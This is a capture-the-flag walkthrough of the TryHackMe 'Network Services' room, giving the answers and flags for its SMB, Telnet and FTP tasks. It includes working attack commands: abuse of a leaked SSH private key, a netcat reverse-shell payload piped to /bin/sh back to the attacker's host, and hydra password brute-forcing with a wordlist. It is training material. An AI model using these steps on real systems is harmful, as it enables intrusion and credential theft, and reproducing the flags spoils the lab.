Network Services
Learn about, then enumerate and exploit a variety of network services and misconfigurations via TryHackMe.
Task 2: Understanding SMB
#1 What does SMB stand for?
Server Message Block
#2 What type of protocol is SMB?
response-request
#3 What do clients connect to servers using?
TCP/IP
#4 What systems does Samba run on?
Unix
Task 3: Enumerating SMB
export ip=10.10.0.130#1 Conduct an nmap scan of your choosing, How many ports are open?
nmap -sV --script=vuln -oN nmap-$ip.out $ipSearch output for open ports
cat nmap-$ip.out | grep open
3
#2 What ports is SMB running on?
cat nmap-$ip.out | grep Samba139/445
#3 Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
enum4linux -A 10.10.0.130
WORKGROUP
#4 What comes up as the name of the machine?
POLOSMB
#5 What operating system version is running?
6.1
#6 What share sticks out as something we might want to investigate?
profiles
Task 4: Exploiting SMB
#1 What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 209
#2 Does the share allow anonymous access? Y/N?
smbclient //$ip/profiles -U AnonymousY
A password entry is prompted, however, the task is requesting no password.
#3 Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
Now that we have access to the SMB profile, we can type ls to view documents stored here.
Working From Home Information.txt is the only non-hidden document listed. Let’s view this document with the more command.
more "Working From Home Information.txt"
John Cactus
hit q to return to smb
#4 What service has been configured to allow him to work from home?
ssh
#5 Okay! Now we know this, what directory on the share should we look in?
.ssh
#6 This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
cd .ssh
ls(the above are multiple entries)
id_rsa.pub is the public key in this instance. id_rsa is the private key, making it more useful.
id_rsa
#7 Download this file to your local machine, and change the permissions to “600” using “chmod 600 [file]”.
chmod 600 id_rsa
#8 What is the smb.txt flag?
ssh -i id_rsa cactus@10.10.0.130
You have used John Cactus’ ssh key to gain access to the server. Now that access is acquired, use ls to view documents and cat the .txt file revealed.
THM{smb_is_fun_eh?}
Task 5: Understanding Telnet
#1 What is Telnet?
application protocol
#2 What has slowly replaced Telnet?
ssh
#3 How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
telnet -p 23 10.10.10.3
#4 The lack of what, means that all Telnet communication is in plaintext?
encryption
Task 6: Enumerating Telnet
#1 How many ports are open on the target machine?
1
#2 What port is this?
8012
#3 This port is unassigned, but still lists the protocol it’s using, what protocol is this?
tcp
#4 Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
0
#5 Based on the title returned to us, what do we think this port could be used for?
a backdoor
#6 Who could it belong to? Gathering possible usernames is an important step in enumeration.
skidy
Task 7: Exploiting Telnet
#1 Great! It’s an open telnet connection! What welcome message do we receive?
SKIDY’S BACKDOOR.
#2 Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
N
Start a tcpdump listener on your local machine.
If using your own machine with the OpenVPN connection, use:
sudo tcpdump ip proto \\icmp -i tun0
If using the AttackBox, use:
sudo tcpdump ip proto \\icmp -i eth0
#3 Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
Y
You’re going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell. Here’s the syntax:
msfvenom -p cmd/unix/reverse_netcat lhost=your_ip lport=4444 R#4 What word does the generated payload start with?
mkfifo
#5 What would the command look like for the listening port we selected in our payload?
nc -lvp 4444
Copy and pate the msfvenom payload into the telnet session and run it. This will give a shell on the target machine.
.RUN mkfifo /tmp/vydsee; nc your_ip 4444 0</tmp/vydsee | /bin/sh >/tmp/vydsee 2>&1; rm /tmp/vydsee(the above is a single entry)
#6 Success! What is the contents of flag.txt?
ls
flag.txt(the above are multiple entries)
THM{y0u_g0t_th3_t3ln3t_fl4g}
Task 8: Understanding FTP
#1 What communications model does FTP use?
client-server
#2 What’s the standard FTP port?
21
#3 How many modes of FTP connection are there?
Active and passive mode.
2
Task 9: Enumerating FTP
#1 How many ports are open on the target machine?
export ip=$your_ip
nmap -sV -oN nmap-$ip.out $ip
cat nmap-$ip.out | grep open(the above are multiple entries)
2
#2 What port is ftp running on?
21
#3 What variant of FTP is running on it?
vsftpd
#4 What is the name of the file in the anonymous FTP directory?
PUBLIC_NOTICE.txt
#5 What do we think a possible username could be?
get PUBLIC_NOTICE.txt
exit
ls
cat PUBLIC_NOTICE.txt(the above are multiple entries)
Mike
Task 10: Exploiting FTP
#1 What is the password for the user “mike”?
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV your_ip ftp(the above is a single entry)
password
Now, connect to the FTP server and use the credentials to login.
ftp $ip
mike
password(the above are multiple entries)
ls
get ftp.txt(the above are multiple entries)
#2 What is ftp.txt?
exit
cat ftp.txt(the above are multiple entries)
THM{y0u_g0t_th3_ftp_fl4g}
